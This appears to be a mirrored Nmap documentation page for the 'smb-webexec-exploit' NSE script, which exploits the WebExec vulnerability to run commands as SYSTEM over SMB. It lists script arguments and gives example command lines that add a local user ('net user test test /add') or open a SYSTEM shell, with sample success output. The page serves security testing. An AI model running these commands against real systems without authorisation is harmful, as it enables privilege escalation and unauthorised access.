logo
DATABASE RESOURCES PRICING ABOUT US

smb-webexec-exploit NSE Script

Description

Attempts to run a command via WebExService, using the WebExec vulnerability. Given a Windows account (local or domain), this will start an arbitrary executable with SYSTEM privileges over the SMB protocol. The argument webexec_command will run the command directly. It may or may not start with a GUI. webexec_gui_command will always start with a GUI, and is useful for running commands such as "cmd.exe" as SYSTEM if you have access. References: * <https://www.webexec.org> * <https://blog.skullsecurity.org/2018/technical-rundown-of-webexec> ### See also: * [ smb-vuln-webexec.nse ](<../scripts/smb-vuln-webexec.html>) ## Script Arguments #### webexec_gui_command The command to run on the target with a GUI #### webexec_command The command to run on the target #### randomseed, smbbasic, smbport, smbsign See the documentation for the [smb](<../lib/smb.html#script-args>) library. #### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername See the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. ## Example Usage nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_command=net user test test /add' -p139,445 <host> nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_gui_command=cmd' -p139,445 <host> ## Script Output | smb-vuln-webexec: |_ Vulnerable: WebExService could be accessed remotely as the given user! | smb-vuln-webexec: | Vulnerable: WebExService could be accessed remotely as the given user! |_ ...and successfully started console command: net user test test /add ## Requires * [msrpc](<../lib/msrpc.html>) * [smb](<../lib/smb.html>) * [stdnse](<../lib/stdnse.html>) * [string](<>) * [shortport](<../lib/shortport.html>) * [stringaux](<../lib/stringaux.html>) * * *


Related